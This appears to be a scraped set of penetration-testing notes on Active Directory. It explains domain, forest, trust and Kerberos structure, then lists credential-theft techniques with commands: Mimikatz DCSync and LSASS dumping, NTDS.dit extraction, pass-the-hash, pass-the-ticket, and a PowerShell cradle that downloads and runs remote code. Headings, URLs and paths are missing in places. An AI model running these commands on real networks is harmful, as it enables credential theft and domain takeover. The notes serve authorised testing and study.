Active Directory


Active Directory enables centralized, secure management of an entire network, which might span a building, a city, or multiple locations throughout the world.

Active Directory Introduction

These antiquated AD designs only focused on the: - Directory information tree - Delegation model - Group Policy Objects (GPOs) structure and accounts management

Securing privileged access - Active Directory administrative tier model:



Component Description
Organizational Units
  • Container object
  • Used to arrange other objects
  • Easier to locate and manage
  • Can delegate the authority to manage
  • Can be nested in other organizational units
  • Container object
  • Collection of administratively defined objects that share a common directory database, security policies, and trust relationships with other domains
  • Each domain is an administrative boundary for objects.
  • A single domain can span multiple physical locations or sites
Domain Trees
  • Collections of domains that are grouped together in hierarchical structures
  • When you add a domain to a tree, it becomes a child of the tree root domain
  • The domain to which a child domain is attached is called the parent domain.
  • A child domain might in turn have its own child domain.
  • The name of a child domain is combined with the name of its parent domain to form its own unique Domain Name System (DNS) name such as Corp.nwtraders.msft.
  • .:. a tree has a contiguous namespace.
  • Instance of Active Directory
  • Each forest acts as a top-level container in that it houses all domain containers for that particular Active Directory instance
  • A forest can contain one or more domain container objects, all of which share a common logical structure, global catalog, directory schema, and directory configuration, as well as automatic two-way transitive trust relationships.
  • The first domain in the forest is called the forest root domain.
  • The name of that domain refers to the forest, such as Nwtraders.msft.
  • By default, information in Active Directory is shared only within the forest.
  • .:. the forest is a security boundary for the information that is contained in that instance of Active Directory
Site Objects
  • Leaf and container objects
  • Topmost object in the hierarchy of objects that are used to manage and implement Active Directory replication
  • Stores the hierarchy of objects that are used by the Knowledge Consistency Checker (KCC) to effect the replication topology
  • Some of the objects located in: NTDS Site Settings objects, subnet objects, connection objects, server objects, and site objects (one site object for each site in the forest)
  • Hierarchy is displayed as the contents of the Sites container, which is a child of the Configuration container

  • Schema - Defines objects and attributes
  • Query and index mechanism - Ability to search and publish objects and properties
  • Global Catalog - Contains info about every object in directory
  • Replication Service - Distributes information across domain controller

  • Kerberos v5 used from Windows Server 2000+

  • Naming conventions
  • User Principal name: winsaafman@scriptdotsh.local
  • DN (Distinguished Names) LDAP names: CN=winsaafman,DC=corp,DC=scriptdotsh,DC=local
    • CN = Common name
    • OU = Organisational Unit
    • DC = Domain
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Get-NetDomain”

AD Trust Types


Trust Type Property Trust Direction Auth. Details
Tree-Root Transitive Two-way Kerberos V5 or NTLM Created automatically when a new Tree is added to a forest.
Parent-Child Transitive Two-way Kerberos V5 or NTLM Created automatically when a child domain is added.
Shortcut Transitive One-way or Two-way Kerberos V5 or NTLM Created Manually. Used in a forest to shorten the trust path to improve authentication times.
Forest Transitive One-way or Two-way Kerberos V5 or NTLM Created Manually. Used to share resources between AD DS forests.

Kerberos Process Across Trust Boundaries


A client from Domain 1 wants to access the server located in Domain 2.

  1. A client from Domain1 requests a TGT from the DC1.
  2. DC1 responds back with the TGT (encrypted with krbtgt hash)
  3. Client shows the TGT and requests a TGS for accessing the server in Domain2.
  4. As DC1 doesn’t find the server in current domain and realizes that the TGS needs to be issued by the DC2 (of Domain2) because the server is located in the Domain2. So it responds back to client with the Inter-realm TGT.
  5. Client shows the TGT encrypted with Inter-Realm trust key to DC2 in the Domain2 and requests TGS to access the server.
  6. DC2 sends back the TGS for Server encrypted with server’s account hash.
  7. Client presents the TGS (encrypted with server’s account hash) to the server for access.

Scope of Authentication

  • Forest-wide authentication - Users from the outside forest have the same level of access to resources in the local forest as users who belong to the local forest.
  • Selective authentication - You need to manually assign permissions on each computer in the domain as well as the resources to which you want users in the second forest to have access (by editing ACE (Access control entry)).


Install-windowsfeature AD-domain-services
Install-WindowsFeature RSAT-ADDS

Import-Module ADDSDeployment
Install-ADDSForest -CreateDnsDelegation:$false ` -DatabasePath "C:\Windows\NTDS" ` -DomainMode "Win2012R2" ` -DomainName "server1.hacklab.local" ` -DomainNetbiosName "server1" `  -ForestMode "Win2012R2" `  -InstallDns:$true `  -LogPath "C:\Windows\NTDS" `  -NoRebootOnCompletion:$false `  -SysvolPath "C:\Windows\SYSVOL" `  -Force:$true

Detect Firewall Blocking AD

PortQryUI - * Run the “Domains & Trusts” option between DCs, or between DCs and any machine * “NOTLISTENING,” 0x00000001, and 0x00000002, that means there is a port block * Can ignore UDP 389 and UDP 88 messages * TCP 42 errors, that just means WINS is not running on the target server

Implementing Least Privilege Model

Attack Types

  • Windows systems vulnerabilities.
  • AD misconfigurations.


pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
  • Automating AD Enumeration (Bloodhound, PowerUp, Responder, CrackMapExec):



utilises the Directory Replication Service (DRS) to retrieve the password hashes from the NTDS.DIT file

lsadump::dcsync /domain:pentestlab.local /all /csv
lsadump::dcsync /domain:pentestlab.local /user:test

executing Mimikatz directly in the domain controller password hashes can be dumped via the lsass.exe process

lsadump::lsa /inject


Automate assessing the security of large Active Directory networks

crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
crackmapexec smb <target(s)> -u username -H NTHASH


Active users (2 == disabled account status)

ldapsearch -x -h $ip -p 389 -D 'SVC_TGS'​ -w ​$password -b ​ "dc=active,dc=htb"​ -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))"​ samaccountname


  • Enumerate domain user accounts -all active.htb/svc_tgs -dc-ip $ip


Using PowerShell and Built-ins

Works in Constrained Mode as well.


Import-Module .\Microsoft.ActiveDirectory.Management.dll
  • Domain: Get-ADDomain
  • Forest: Get-ADForest
  • Trust: Get-ADTrust -Filter *
  • Users: Get-ADUser -Filter *
  • Groups : Get-ADGroup -Filter *
  • Filter Groups for User: Get-ADGroup -Filter {Name -like "*admin*"} | select name, GroupScope


  • All domain computers: Get-NetComputer
  • Domain Controller: Get-NetDomainController
  • Groups: Get-NetGroup
  • Sessions: Get-NetSession
  • ACL for AD objects: Get-ObjectAcl
  • Check if current user context has local-admin access to hosts in the domain: Find-LocalAdminAccess -Verbose
  • Enumerate members of local-admin groups across all machines: Invoke-EnumerateLocalAdmin -Verbose

Snapshot for Offline Analysis



UNC path: \\\tools


  • Finds groups and group members of each group.
  • Gets Domain computers in the domain.
  • Obtain local admins for each computer.
  • List Active sessions on each computer.
  • And then creates relationships between all these findings.



  • Folder which resides on each and every domain controller within the domain.
  • Contains the domains public files that need to be accessed by clients and kept synchronised between domain controllers.
  • Default location is C:\Windows\SYSVOL
  • The SYSVOL folder can be accessed through:
  • share \\\sysvol
  • or the local share name on the server \\servername\sysvol.
  • Uses DFS to share the relevant folders to users and clients. - Distributed File System. Client and server services that allow servers to organize distributed file shares into a distributed file system.
  • File Replication Service - FRS is a multi-master, multi-threaded replication technology.
  • Introduced in Windows 2000 to replace the previous LMREPL technology used in NT3.x and 4 days
  • Ageing Cache - Detects the change by monitoring the NTFS USN journal (stored in NTFRS database) (every 3 seconds)
  • Replaced by DFSR (Distributed File System Replication) in Windows 2008 or higher
    • Auto-healing functions in place to remedy some of the issues that FRS
    • Instead of replicating entire files we only replicate the chunks of data that have changed
    • Based on MD4 hash of the file

The log contains information about the file and the time it was changed, this is then used to build its change message. To ensure the file and all it’s attributes (i.e. permissions) are kept intact FRS calls the backup APIwhich uses VSS technology to take a snapshot of the file and it’s attributes. This backup file is then compressed and stored in the staging area folder. At this point the outbound log is updated (again this is actually a table within the FRS database). This contains information about all the changes for a specified replication set. If in step 1 a file was deleted rather than created then we don’t create a staging file, but the outbound log reflects the deletion. FRS on DC1 then sends a change notification to its replication partner DC2. DC2 adds the information about the change into its inbound log and accepts the change then sends a change acknowledgment back to DC1. DC2 then copies the file from DC1 into its staging area. It then writes an entry to its outbound log to allow other partners to pickup the change. DC2 then calls the backup API to restore the file from the staging area into the SYSVOL folder. So there you have it, FRS replication. There is a very detailed and in-depth reference guide on TechNethere for further reference.


Attack Patterns



Dumping AD Credentials


Need domain admin credentials: -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>


  • AD data stored in: %SYSTEMROOT%\NTDS\ntds.dit
  • Cannot be copied directly to another location
  • Can be extracted using
    • Domain Controller Replication Services
    • Native Windows Binaries
    • WMI
    • Backups / External Storage for DC
    • VMWare / HyperV for virtual DCs
    • VMWare admin can call virtual DC within VMWare
    • Clone a DC and copy the storage file
    • No events triggered
    • NTDSUtil
    • DC Promo has to copy from another DC
    • But if NTDSUtil was used to create an IMF (Install From Media), it makes a copy of NTDS.dit
      • Can use NTDSUtil to create an IMF or look for IMF in network
  • Extraction techniques and tools: - Dumping Domain Password Hashes


  • cmd.exe as Administrator
  • ntdsutil
activate instance NTDS

mount <UUID>
  • copy NTDS.dit (located in Windows\NTDS\NTDS.dit by default)
  • ntdsutil
unmount <UUID>
delete <UUID>
reg.exe save HKLM\SYSTEM <path_where_you_want_to_save_it> -system <path_to_system_hive> -ntds <path_to_ntds.dit> LOCAL

Dumping Credentials on DC

  • Take memory dump of LSASS process using task manager and use Mimikatz offline
  • Run Mimikatz on DC
  • Invoke-Mimikatz on DC via PS remoting

Pass the Hash



  • In typical scenario:
  • User type the password
  • LSASS hash the password (LM, NTLM) and send it to service for authentication
  • In attack scenario:
  • Attacker pass the hash (LM, NTML) itself to LSASS which is sent to service
  • Preventions
  • Disable NTML hashes
  • "Protected Users" group
  • Do not leave lot of NTLM authentication footprint in eventless

Over Pass the Hash / Pass the Key

image-20190603075915450> Ref:'t-Get-It.pdf

  • If NTLM hash is available, encrypt timestamp with hash and sent it to KDC in AS-REQ to get a TGT
  • Keys are in:
  • Client LSASS memory
    • Prevented by "Protected Users" group
  • Active Directory
    • NTDS.dit and SYSTEM hive
    • Offline
    • [Tool] NTDSXtract
    • python ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./work -name Administrator --syshive SYSTEM --supplcreds --passwordhashes --lmoutfile ./lm --ntoutfile ./nt --pwdformat john
    • privilege::debug sekurlsa::ekeys
    • Online
    • privilege::debug lsadump::lsa /inject /name:Administrator
  • Keys are in:
  • DES
  • RC4 - Non domain salted NTML hash
  • AES128 AES256 keys (NT6+)
    • Use PBKDF2
    • Salted
    • 4096 iterations
    • Cracking is difficult
  • Over pass the hash
  • privilege::debug sekurlsa::pth /user:Administrator /domain:<DomainName> /ntlm:<Hash>
  • References

Pass the Ticket




  • Inject the TGT in to the LSASS Kerberos Provider
  • Do not ask the KDC for the TGT, instead ask the KDC to give us a TGS
  • Can also inject TGS in to the LSASS Kerberos Provider
  • Exporting from memory:
  • API only allow exporting current user's tickets (your tickets)
  • TGT: AllowTgtSessionKey reg-key must be set
  • TGS: No restrictions
mimikatz > kerberos::list [/export]
mimikatz > kerberos::ptt ticket
  • For all users in LSASS memory:
sekurlsa::tickets export
kerberos:ptt <ticket.kirbi>


  • Used to sync AD to Azure
  • Can be used to get credentials from AD
  • If reverse encryption is enabled for an account, clear text password can be obtained.
  • Needs Administrator or Domain Controller rights
  • By default, no logs since this is done through official RPC (remotely)
  • Implemented by: Mimikatz (lsadump:dcsync), Impacket, DSInternals


  • DCSync is easy to detected

NRPC (NetLogon)

  • When you have domain admin account for one DC, can as another DC to send all NTLM hashed of computer accounts and domain controller accounts.
  • Can be used to create silver tickets.
  • If you have rights flip some bytes of the account, can make a normal user account a workstation account. Can be used to get user accounts using this.


  • Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory:
  • Escalating privileges with ACLs in Active Directory:

















  • How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller:
  • Attack Methods for Gaining Domain Admin Rights in Active Directory:
  • Mimikatz DCSync Usage, Exploitation, and Detection:
  • How Attackers Dump Active Directory Database Credentials:


  • Active Directory Core Security Principles & Best Practices:
  • Active Directory Kill Chain Attack & Defense:
  • Microsoft-Blue-Forest:
  • Welcome to building your first domain controller!:
  • Pwn and Defend - Active Directory Domain Enumeration:


  • Microsoft has definitely raised the bar: accounts that are members of the localgroup “Administrators” are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. Oh, except (as pwnag3 reports and our experiences confirm) the RID 500 built-in Administrator account, even if it’s renamed.